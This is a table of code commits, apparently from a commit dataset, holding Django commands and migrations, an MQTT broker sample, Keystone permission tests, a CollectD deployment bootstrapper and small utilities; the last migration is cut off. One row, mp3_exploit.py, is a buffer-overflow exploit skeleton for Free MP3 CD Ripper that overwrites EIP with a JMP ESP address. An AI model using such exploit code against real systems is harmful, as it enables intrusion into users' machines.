commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
852ade075e69492ee4a4cd7096709b2724782180 | add a management command to export details of users who submitted stories as csv | apps/stories/management/commands/export_stories_csv.py | apps/stories/management/commands/export_stories_csv.py | from django.core.management.base import BaseCommand
from stories.models import Story
from optparse import make_option
import codecs
import csv
class Command(BaseCommand):
args = ""
help = """Dump out all comments text for Web SYS Stories
python manage.py export_stories_comments --file=<path/to/file.csv> --admin2=587 --from=2015-01-01 --to=2015-08-15
Use only one of 'admin1', 'admin2', 'admin3' or 'school'
Specify from and to dates as YYYY-MM-DD
"""
option_list = BaseCommand.option_list + (
make_option('--file',
help='Path to output file'),
make_option('--admin1',
help='Admin 1 id to filter by'),
make_option('--admin2',
help='Admin 2 id to filter by'),
make_option('--admin3',
help='Admin 3 id to filter by'),
make_option('--school',
help='School id to filter by'),
make_option('--from',
help='From date to filter by'),
make_option('--to',
help='To date to filter by'),
make_option('--source',
help='Source to filter by, eg. web, ivrs, etc.'),
)
def handle(self, *args, **options):
'''
TODO: make querying more efficient using select_related or so
'''
filename = options.get('file', None)
if not filename:
print "Please specify a filename with the --file argument"
return
out = codecs.open(filename, mode="w", encoding="utf-8")
key, val = self.get_query(options)
stories_qset = Story.objects.all()
print key, val
if key:
stories_qset = stories_qset.filter(**{key: val})
if options.get('from', None):
from_date = self.get_date(options.get('from'))
stories_qset = stories_qset.filter(date__gte=from_date)
if options.get('to', None):
to_date = self.get_date(options.get('to'))
stories_qset = stories_qset.filter(date__lte=to_date)
if options.get('source', None):
source_name = options.get('source')
stories_qset = stories_qset.filter(group__source__name=source_name)
if not stories_qset.exists():
print "No stories found matching query"
return
fields = [
"story_id",
"date",
"name",
"email",
"phone",
"school",
"admin1",
"admin2",
"admin3"
]
writer = csv.writer(out)
writer.writerow(fields)
print "writing file"
for story in stories_qset:
row = self.get_row(story)
writer.writerow(row)
out.close()
print "done"
def get_row(self, story):
return [
story.id,
story.date_of_visit.strftime("%Y-%m-%d"),
story.name,
story.email,
story.telephone,
story.school.name,
story.school.schooldetails.admin1.name,
story.school.schooldetails.admin2.name,
story.school.schooldetails.admin3.name,
]
def get_query(self, options):
query_string_fragment = "school__schooldetails__"
key = None
if options.get('admin1', None):
key = 'admin1'
val = options.get('admin1')
if options.get('admin2', None):
key = 'admin2'
val = options.get('admin2')
if options.get('admmin3', None):
key = 'admin3'
val = options.get('admin3')
if key:
return (query_string_fragment + key, val,)
if options.get('school', None):
key = 'school'
val = options.get('school')
return (key, val,)
return (None, None,)
def get_date(self, date_string):
return datetime.datetime.strptime(date_string, "%Y-%m-%d")
| Python | 0 | |
1ac09013e8cf89e83418de0be9d83b87a0a20634 | Create mp3_exploit.py | mp3_exploit.py | mp3_exploit.py | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Purpose: To provide a means to demonstrate a simple file upload proof of concept related to
exploiting Free MP3 CD Ripper.
'''
import struct
filename="exploit.wav"
fill ="A"*4112
#eip = struct.pack('<I',0x42424242) # EIP overwrite verfication
eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll
nop = "\x90"*16
# Place for calc.exe shellcode
calc = ()
# Place for actual shellcode
shell =()
#exploit = fill + eip + nop + calc #loader for simple proof of concept for shell cdoe
exploit = fill + eip + nop + shell #loader for real shell access
writeFile = open (filename, "w")
writeFile.write(exploit)
writeFile.close()
| Python | 0 | |
68ea60fd87e3e0240f82a42f0f6b4dcd65732f97 | Add MQTT server example | mqtt-server.py | mqtt-server.py | #!/usr/bin/python3
#
# Copyright (c) 2015-2016, Fabian Affolter <fabian@affolter-engineering.ch>
# Released under the MIT license. See LICENSE file for details.
#
# Source: https://github.com/beerfactory/hbmqtt/blob/develop/samples/broker_start.py
#
import logging
import asyncio
import os
from hbmqtt.broker import Broker
logger = logging.getLogger(__name__)
config = {
'listeners': {
'default': {
'type': 'tcp',
'bind': '0.0.0.0:1883',
},
'ws-mqtt': {
'bind': '127.0.0.1:3000',
'type': 'ws',
'max_connections': 10,
},
},
}
broker = Broker(config)
@asyncio.coroutine
def test_coro():
yield from broker.start()
if __name__ == '__main__':
formatter = "[%(asctime)s] :: %(levelname)s :: %(name)s :: %(message)s"
logging.basicConfig(level=logging.INFO, format=formatter)
asyncio.get_event_loop().run_until_complete(test_coro())
asyncio.get_event_loop().run_forever()
| Python | 0.000001 | |
c0b05a43e10693f8aab87a7f86726d512b7494fc | Add tenant exporter for accounting | bluebottle/clients/management/commands/export_tenants.py | bluebottle/clients/management/commands/export_tenants.py | import json
from rest_framework.authtoken.models import Token
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
from bluebottle.clients import properties
from bluebottle.clients.models import Client
from bluebottle.clients.utils import LocalTenant
class Command(BaseCommand):
help = 'Export tenants, so that we can import them into the accounting app'
def add_arguments(self, parser):
parser.add_argument('--file', type=str, default=None, action='store')
def handle(self, *args, **options):
results = []
for client in Client.objects.all():
properties.set_tenant(client)
with LocalTenant(client, clear_tenant=True):
ContentType.objects.clear_cache()
accounts = []
for merchant in properties.MERCHANT_ACCOUNTS:
if merchant['merchant'] == 'docdata':
accounts.append(
{
'service_type': 'docdata',
'username': merchant['merchant_name']
}
)
api_key = Token.objects.get(user__username='accounting').key
results.append({
"name": client.schema_name,
"domain": properties.TENANT_MAIL_PROPERTIES['website'],
"api_key": api_key,
"accounts": accounts
})
if options['file']:
text_file = open(options['file'], "w")
text_file.write(json.dumps(results))
text_file.close()
else:
print json.dumps(results)
| Python | 0 | |
dfbf888ca0b56448a4f211900b16e3c85648b241 | Add migration for changing docstring of Note.is_private to unicode | editorsnotes/main/migrations/0025_auto_20160628_0913.py | editorsnotes/main/migrations/0025_auto_20160628_0913.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-28 09:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0024_topic_ld'),
]
operations = [
migrations.AlterField(
model_name='note',
name='is_private',
field=models.BooleanField(default=False, help_text="If true, will only be be viewable to users who belong to the note's project."),
),
]
| Python | 0 | |
a45a0bb366ae28d38d543ce71f32f625e9b80042 | add tools module | modules/tools.py | modules/tools.py | from pandas import DataFrame
from pandas.tseries.tools import to_datetime
#|Create time series from trade history DataFrame
def time_series(df, period):
ts = DataFrame(columns=('timestamp', 'price', 'high',
'low', 'open', 'amount'))
tmin = int(df['timestamp'].min())
tmax = int(df['timestamp'].max())
for tsmp in range(tmin, tmax, period):
slic = time_slice(df, tsmp, period)
ts = ts.append(slic)
ts = date_index(ts)
return ts
def time_slice(df, tsmp, period):
lprice = df[df['timestamp'] < tsmp].tail(1)['price']
df = df[df['timestamp'] >= tsmp]
df = df[df['timestamp'] < (tsmp + period)]
if len(df.index) == 0:
slic = DataFrame({'timestamp' : [tsmp], 'price': lprice,
'high': lprice, 'low': lprice,
'open': lprice, 'amount': 0.0})
else:
slic = DataFrame({'timestamp' : [tsmp],
'price': round(df['price'].iloc[-1], 3),
'high': round(df['price'].max(), 3),
'low': round(df['price'].min(), 3),
'open': round(df['price'].iloc[0], 3),
'amount': round(df['amount'].sum(), 4)})
return slic
#|Create datetime index for DataFrame using "timestamp" column
def date_index(df):
date = df['timestamp']
date = to_datetime(date, unit='s')
df['date'] = date
df = df.set_index('date')
return df
#Outputs number of seconds in provided number of days/hours/minutes
def seconds(days=0, hours=0, minutes=0, typ=''):
if typ == '':
total = 86400*days + 3600*hours + 60*minutes
elif typ == 'd':
total = 86400
elif typ == 'h':
total = 3600
elif typ == 'm':
total = 50
return total
| Python | 0.000001 | |
2f4d413e14011847138d6afd27a210fc58823c8a | add certificate and key migrations | rootfs/api/migrations/0004_auto_20160124_2134.py | rootfs/api/migrations/0004_auto_20160124_2134.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-24 21:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0003_auto_20160114_0310'),
]
operations = [
migrations.AlterField(
model_name='certificate',
name='expires',
field=models.DateTimeField(editable=False),
),
migrations.AlterField(
model_name='key',
name='fingerprint',
field=models.CharField(editable=False, max_length=128),
),
]
| Python | 0.000001 | |
d1aa553f739e91cd470eea23042b6c8bcebe9b6f | add mocked integrationtest for the deprecationwarning of makeitem | testing/python/test_deprecations.py | testing/python/test_deprecations.py | import pytest
from _pytest.python import PyCollector
class PyCollectorMock(PyCollector):
"""evil hack"""
def __init__(self):
self.called = False
def _makeitem(self, *k):
"""hack to disable the actual behaviour"""
self.called = True
def test_pycollector_makeitem_is_deprecated():
collector = PyCollectorMock()
with pytest.deprecated_call():
collector.makeitem('foo', 'bar')
assert collector.called
| Python | 0 | |
e348ec573a4882258466cdc2ab73da8b4dbbe256 | Create pillu.py | modules/pillu.py | modules/pillu.py | #test
| Python | 0.000003 | |
8e726895d1e4e27b0b9548103cd1b202de79c21e | Anonymize nginx logs | ngxtop/anonym.py | ngxtop/anonym.py | import sqlite3
import csv
import datetime
def main(args):
# input
fn_database = 'ngxtop.db'
# outputs
fn_workset = 'workset.csv'
fn_scenario = 'scenario.csv'
conn = sqlite3.connect(fn_database)
cursor = conn.cursor()
# Build map filename to anonym filename
map_filename = build_map_filename(cursor)
map_addr = build_map_addr(cursor)
output_workset(fn_workset,sorted(map_filename.values(),key=lambda x:x[0]))
output_scenario(fn_scenario,cursor,map_filename,map_addr)
conn.close()
pass
def build_map_addr(cursor):
m = {}
i = 0
cursor.execute("select distinct remote_addr from log")
for row in cursor:
m[row[0]] = i
i = i + 1
return m
def build_map_filename(cursor):
m = {}
i = 0
cursor.execute("select filename, size from (select request_path as filename, max(bytes_sent) as size from log where bytes_sent > 4096 group by request_path) order by size")
for row in cursor:
filename = row[0]
size = row[1]
m[filename] = (i,size)
i = i + 1
pass
return m
def output_workset(fn_workset,workset):
with open(fn_workset,'w') as cvs_file:
writer = csv.writer(cvs_file, delimiter=',')
writer.writerow(['data','bytes'])
for row in workset: writer.writerow(row)
start_time = None
def convert_time(strtime):
global start_time
time = datetime.datetime.strptime(strtime.split(" ")[0],'%d/%b/%Y:%H:%M:%S')
if start_time == None:
start_time = time
return 0
return int((time - start_time).total_seconds())
def output_scenario(fn_scenario,cursor,map_filename,map_addr):
csvheader = ['time','data','bytes','addr']
header = ['time_local', 'request_path', 'bytes_sent', 'remote_addr']
cursor.execute("select %s from log where bytes_sent > 4096 order by time_local" % (" ,".join(header)))
db_header = [d[0] for d in cursor.description]
for h in header:
if not h in db_header:
raise Exception('Missing header')
with open(fn_scenario,'w') as cvs_file:
writer = csv.writer(cvs_file, delimiter=',')
writer.writerow(csvheader)
for row in cursor:
(strtime,filename,bytes,remote_addr) = row
time = convert_time(strtime)
data = map_filename[str(filename)][0]
addr = map_addr[remote_addr]
writer.writerow([time,data,bytes,addr])
pass
if __name__ == '__main__':
import sys
main(sys.argv)
| Python | 0.999552 | |
1eb2e1390d41c65943e777a66918df87b4ee8799 | Add constructive_hierarchy | constructive_hierarchy.py | constructive_hierarchy.py | '''Reason about a directed graph in which the (non-)existance of some edges
must be inferred by the disconnectedness of certain vertices. Collect (truthy)
evidence for boolean function return values.'''
def transitive_closure_set(vertices, edges):
'''Find the transitive closure of a set of vertices.'''
neighbours = {b: (a, b) for a, b in edges if a in vertices}
if set(neighbours).issubset(vertices):
return vertices
return transitive_closure_set(vertices | neighbours, edges)
#def downward_closure(vertex, edges):
# '''Find the downward closure of a vertex.'''
# return transitive_closure_set({vertex}, edges)
#
#def upward_closure(vertex, edges):
# '''Find the upward closure of a vertex.'''
# return transitive_closure_set({vertex}, {(b, a) for a, b in edges})
#
#def is_connected(a, b, edges):
# '''Check if there is a path from a to b.'''
# return b in downward_closure(a, edges)
#
#def is_separated(a, b, edges, disconnections):
# '''Check that a and b will remain not connected even if edges are added to
# the graph, as long as the vertex pairs listed in disconnections remain
# disconected.'''
# return any((p, q) in disconnections
# for p in upward_closure(a, edges)
# for q in downward_closure(b, edges))
#
#def find_possible_connections(vertices, edges, disconnections):
# '''Find which edges can be added to create new connections, without
# connecting any pairs in disconnections.'''
# return {(a, b) for a in vertices for b in vertices if
# not is_connected(a, b, edges) and
# not is_separated(a, b, edges, disconnections)}
#
#def is_isthmus(edge, edges):
# return not is_connected(*edge, edges - {edge})
#
#def spanning_tree(edges):
# for edge in edges:
# if not is_isthmus(edge, edges):
# return spanning_tree(edges - {edge})
# return edges
#
#def rank_possible_edge(edge, vertices, edges, disconnections):
# evaluator = lambda x, y: len(find_possible_connections(vertices, x, y))
# exists_rank = evaluator(edges | {edge}, disconnections)
# not_exists_rank = evaluator(edges, disconnections | {edge})
# return abs(exists_rank) + abs(not_exists_rank)
| Python | 0.999379 | |
25ff8c6f8bc9d70886d004f8b64f08facb8c12cf | Create Find the Celebrity sol for Leetcode | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | # The knows API is already defined for you.
# @param a, person a
# @param b, person b
# @return a boolean, whether a knows b
# def knows(a, b):
class Solution(object):
def findCelebrity(self, n):
"""
:type n: int
:rtype: int
"""
if n < 2:
return -1
candidate = 0
for i in range(1, n):
if not knows(i, candidate):
candidate = i
for i in range(n):
if i == candidate:
continue
if not knows(i, candidate) or knows(candidate, i):
return -1
return candidate
| Python | 0 | |
3eeaa890f0a7afcf7a6f470055c5bc0fda20ae5c | create moistureCaptor.py | captors-enabled/moistureCaptor.py | captors-enabled/moistureCaptor.py |
class Captor():
id = 5
def Captor():
self.id = 5
def callback(self):
moisture = 0
#start communication with server
return moisture
def getiId(self):
return self.id
| Python | 0.000034 | |
25aa486fcba631a251db4f0366d4d4f713a86f37 | Add missing migration file | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('UserInfo', '0002_auto_20161208_1712'),
]
operations = [
migrations.AlterModelOptions(
name='pledgeclass',
options={'ordering': ['dateInitiated'], 'verbose_name': 'Pledge Class', 'verbose_name_plural': 'Pledge Classes'},
),
]
| Python | 0.000002 | |
5e51cda3a7441f6e31477988b1288d1497fe23d9 | Add arguments snippet | code/python/snippets/arguments.py | code/python/snippets/arguments.py | """
Add command line arguments to your script.
This snippet adds the default command line arguments required for any interaction with the UpGuard API.
To Use:
1. Copy snippet to the top of your script
2. Populate description (this is shown when running `--help`)
3. Access arguments with `args` object, for example: `args.target_url`
"""
import argparse
parser = argparse.ArgumentParser(description='Retrieve a list of open User Tasks and their associated nodes')
parser.add_argument('--target-url', required=True, help='URL for the UpGuard instance')
parser.add_argument('--api-key', required=True, help='API key for the UpGuard instance')
parser.add_argument('--secret-key', required=True, help='Secret key for the UpGuard instance')
parser.add_argument('--insecure', action='store_true', help='Ignore SSL certificate checks')
args = parser.parse_args()
| Python | 0.000007 | |
8bdc9c0685500b822787779b5ebffa46b00d8138 | Add script | lightshow.py | lightshow.py | #!/usr/bin/sudo / usr/bin/python
import RPi.GPIO as GPIO
from time import sleep
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
leds = {'floor':[], 'top-left':[]}
def setupled(name, pins):
for i in range(0, 3):
GPIO.setup(pins[i], GPIO.OUT)
leds[name].append(GPIO.PWM(pins[i], 100))
setupled('floor', [11, 13, 15])
setupled('top-left', [12, 16, 18])
for key, value in leds.items():
for i in value:
i.start(0)
WHITE = [255, 255, 255]
BLACK = [0, 0, 0]
RED = [255, 0, 0]
GREEN = [0, 255, 0]
BLUE = [0, 0, 255]
YELLOW = [255, 255, 0]
PURPLE = [255, 0, 255]
CYAN = [0, 255, 255]
def setcolor(led, color):
for i in xrange(0, 3):
leds[led][i].ChangeDutyCycle((255 - color[i]) * 100 / 255)
print('Setting {} to {}'.format(led, color))
# Start program here
while True:
setcolor('floor', RED)
sleep(1)
setcolor('top-left', GREEN)
sleep(1)
setcolor('floor', BLUE)
sleep(1)
setcolor('top-left', YELLOW)
sleep(1)
setcolor('floor', PURPLE)
sleep(1)
setcolor('top-left', CYAN)
sleep(1)
setcolor('floor', WHITE)
sleep(1)
setcolor('top-left', BLACK)
sleep(1)
for i in xrange(0, 256):
setcolor('floor', [i, i, i])
sleep(0.01)
for x in xrange(0, 256):
y = 255 - x
setcolor('top-left', [y, y, y])
sleep(0.01)
for key, value in rooms.items():
for i in value:
i.stop()
GPIO.cleanup()
| Python | 0.000002 | |
1a4052deb8e0ab2deb7038220ae23d7bb9311ce9 | Add initial version of the script | ovf_to_facter.py | ovf_to_facter.py | #!/usr/bin/python
#stdlib
import json
import os
import subprocess
from xml.dom.minidom import parseString
def which(cmd):
"""Python implementation of `which` command."""
for path in os.environ["PATH"].split(os.pathsep):
file = os.path.join(path, cmd)
if os.path.exists(file) and os.access(file, os.X_OK):
return file
elif os.name == "nt":
for ext in os.environ["PATHEXT"].split(os.pathsep):
full = file + ext
if os.path.exists(full) and os.access(full, os.X_OK):
return full
return None
FACTER = which("facter")
VMTOOLS = which("vmtoolsd")
def facter(*args):
facts = json.loads(subprocess.check_output([FACTER, '--json', '--no-external'] + [ arg for arg in args ]))
return facts
def findXmlSection(dom, sectionName):
sections = dom.getElementsByTagName(sectionName)
return sections[0]
def getOVFProperties(ovfEnv):
dom = parseString(ovfEnv)
section = findXmlSection(dom, "PropertySection")
propertyMap = {}
for property in section.getElementsByTagName("Property"):
key = property.getAttribute("oe:key")
value = property.getAttribute("oe:value")
propertyMap[key] = value
dom.unlink()
return propertyMap
def getVMWareOvfEnv():
if VMTOOLS == None:
raise Exception("VMWare Tools not installed.")
try:
ovf = subprocess.check_output([VMTOOLS, '--cmd', 'info-get guestinfo.ovfenv'], stderr=subprocess.STDOUT)
properties = getOVFProperties(ovf)
print "ovf=true"
for key, value in properties.iteritems():
print "ovf_" + key + "=" + value
except:
print "ovf=false"
return
if __name__ == "__main__":
facts = facter("is_virtual", "virtual")
if (facts['is_virtual'] == 'true') and (facts['virtual'] == 'vmware'):
getVMWareOvfEnv()
| Python | 0.000001 | |
2f0ba9368bc44cffce1dcf2ec483aabf04c2e127 | add python #5 | python/5.py | python/5.py | #!/usr/bin/env python
'''
Problem
=======
2520 is the smallest number that can be divided by each of the numbers from 1 to 10
without any remainder. What is the smallest positive number that is evenly divisible
by all of the numbers from 1 to 20?
Latest Run Stats
====== === =====
'''
from math import ceil
from math import sqrt
def primeSieve(num):
noprimes = {j for i in range(2, int(ceil(sqrt(num)))) for j in range(i*2, num, i)}
return {i for i in range(2, num) if i not in noprimes}
def anyDivisible(nums, divisor):
for i in nums:
if i%divisor == 0:
return True
return False
limit = 20 #upper limit for divisors
divisors = range(2,limit+1)
primes = primeSieve(max(divisors))
primeFactors = []
# Use a LCM table to determine the prime factors that make up the solution
for prime in primes:
if divisors == []:
break
while True:
divisible = anyDivisible(divisors, prime)
if not divisible:
break
divisors = [i if i% prime != 0 else i/prime for i in divisors]
divisors = [i for i in divisors if i > 1]
primeFactors.append(prime)
answer = reduce(lambda primeFactor, total: primeFactor*total, primeFactors)
print answer #should be only print statement
| Python | 0.000032 | |
fdf8cb1f0420eef27592d32f2e10066482304314 | Add region protection tests for system readers | keystone/tests/unit/protection/v3/test_regions.py | keystone/tests/unit/protection/v3/test_regions.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from six.moves import http_client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _UserRegionTests(object):
"""Common default functionality for all users."""
def test_user_can_get_a_region(self):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
with self.test_client() as c:
c.get('/v3/regions/%s' % region['id'], headers=self.headers)
def test_user_can_list_regions(self):
expected_regions = []
for _ in range(2):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
expected_regions.append(region['id'])
with self.test_client() as c:
r = c.get('/v3/regions', headers=self.headers)
for region in r.json['regions']:
self.assertIn(region['id'], expected_regions)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_UserRegionTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_reader = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_reader
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.reader_role_id
)
auth = self.build_authentication_request(
user_id=self.user_id, password=system_reader['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def test_user_cannot_create_regions(self):
create = {'region': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/regions', json=create, headers=self.headers,
expected_status_code=http_client.FORBIDDEN
)
def test_user_cannot_update_regions(self):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
with self.test_client() as c:
update = {'region': {'description': uuid.uuid4().hex}}
c.patch(
'/v3/regions/%s' % region['id'], json=update,
headers=self.headers,
expected_status_code=http_client.FORBIDDEN
)
def test_user_cannot_delete_regions(self):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
with self.test_client() as c:
c.delete(
'/v3/regions/%s' % region['id'],
headers=self.headers,
expected_status_code=http_client.FORBIDDEN
)
| Python | 0.000001 | |
e4139c81bf914840d7223557f1f6da926a28413b | Add bootstrap script to run playbook locally | local_run.py | local_run.py | #!/usr/bin/env python2
"""Deploy CollectD on localhost for monitoring with mist.io"""
import os
import sys
import argparse
import subprocess
TMP_DIR = "/tmp/mistio"
VENV_VERSION = "1.11.6"
ANSIBLE_VERSION = "1.7.2"
PYPI_URL = "https://pypi.python.org/packages/source/"
PLAYBOOK_PATH = "ansible/main.yml"
def shellcmd(cmd, exit_on_error=True, verbose=True):
"""Run a command using the shell"""
if verbose:
print "Running:", cmd
return_code = subprocess.call(cmd, shell=True)
if exit_on_error and return_code:
sys.exit("ERROR: Command '%s' exited with return code %d."
% (cmd, return_code))
return return_code
def main():
"""Deploy CollectD on localhost for monitoring with mist.io"""
parser = argparse.ArgumentParser(
description="Deploy mist.io CollectD on localhost.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("uuid", help="Machine uuid assigned by mist.io.")
parser.add_argument("password",
help="Machine password assigned by mist.io, "
"used to sign/encrypt CollectD data.")
parser.add_argument("-m", "--monitor-server", default="monitor1.mist.io",
help="Remote CollectD server to send data to.")
parser.add_argument(
"--no-check-certificate", action='store_true',
help="Don't verify SSL certificates when "
"get_urling dependencies from HTTPS."
)
args = parser.parse_args()
python = sys.executable
# check if deploy_collectd repo is locally available
playbook_path = ""
if __file__ != '<stdin>':
self_dir = os.path.dirname(os.path.realpath(__file__))
playbook_path = os.path.join(self_dir, PLAYBOOK_PATH)
if not os.path.exists(playbook_path):
playbook_path = ""
print "*** Will work in '%s' ***" % TMP_DIR
os.mkdir(TMP_DIR)
os.chdir(TMP_DIR)
if not shellcmd("command -v wget", False, False):
# use wget
get_url = "wget"
if args.no_check_certificate:
get_url += " --no-check-certificate"
elif not shellcmd("command -v curl", False, False):
# use curl
get_url = "curl -L -O"
if args.no_check_certificate:
get_url += " -k"
else:
sys.exit("ERROR: Neither 'curl' nor 'wget' found, exiting.")
print "*** Fetching virtualenv tarball ***"
url = "%s/v/virtualenv/virtualenv-%s.tar.gz" % (PYPI_URL, VENV_VERSION)
shellcmd("%s %s" % (get_url, url))
print "*** Extracting virtualenv tarball ***"
shellcmd("tar -xzf virtualenv-%s.tar.gz" % VENV_VERSION)
print "*** Creating virtualenv ***"
shellcmd("%s virtualenv-%s/virtualenv.py env" % (python, VENV_VERSION))
print "*** Installing virtualenv in virtualenv :) ***"
shellcmd("env/bin/pip install virtualenv-%s.tar.gz" % VENV_VERSION)
print "*** Fetching ansible tarball ***"
url = "%s/a/ansible/ansible-%s.tar.gz" % (PYPI_URL, ANSIBLE_VERSION)
shellcmd("%s %s" % (get_url, url))
print "*** Extracting ansible tarball ***"
shellcmd("tar -xzf ansible-%s.tar.gz" % ANSIBLE_VERSION)
print "*** Removing pycrypto from ansible requirements ***"
shellcmd("sed -i \"s/, 'pycrypto[^']*'//\" ansible-%s/setup.py"
% ANSIBLE_VERSION)
print "*** Removing paramiko from ansible requirements ***"
shellcmd("sed -i \"s/'paramiko[^']*', //\" ansible-%s/setup.py"
% ANSIBLE_VERSION)
print "*** Installing ansible in virtualenv ***"
shellcmd("env/bin/pip install ansible-%s/" % ANSIBLE_VERSION)
print "*** Generate ansible inventory file for localhost ***"
with open("inventory", "w") as fobj:
fobj.write("localhost ansible_connection=local "
"ansible_python_interpreter=%s\n" % python)
print "*** Generate ansible.cfg ***"
with open("ansible.cfg", "w") as fobj:
fobj.write("[defaults]\n"
"hostfile = inventory\n"
"nocows = 1\n")
if playbook_path:
print "*** CollectD deployment playbook is locally available ***"
else:
print "*** Fetching mistio/deploy_collectd repo tarball ***"
url = "https://github.com/mistio/deploy_collectd/archive/master.tar.gz"
shellcmd("%s %s" % (get_url, url))
print "*** Extracting mistio/deploy_collectd tarball ***"
shellcmd("tar -xzf master.tar.gz")
playbook_path = "deploy_collectd-master/%s" % PLAYBOOK_PATH
print "*** Running CollectD deployment playbook against localhost ***"
shellcmd("env/bin/ansible-playbook %s -e 'uuid=%s password=%s monitor=%s'"
% (playbook_path, args.uuid, args.password, args.monitor_server))
print "*** CollectD deployment playbook completed successfully ***"
if __name__ == "__main__":
main()
| Python | 0 | |
d14af37197c35fa72c13746f4aef8bf296014382 | 添加数据库迁移 设置name为unique | experiment/migrations/0003_auto__add_unique_lessoncategory_name.py | experiment/migrations/0003_auto__add_unique_lessoncategory_name.py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'LessonCategory', fields ['name']
db.create_unique(u'experiment_lessoncategory', ['name'])
def backwards(self, orm):
# Removing unique constraint on 'LessonCategory', fields ['name']
db.delete_unique(u'experiment_lessoncategory', ['name'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'experiment.experiment': {
'Meta': {'object_name': 'Experiment'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'create_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
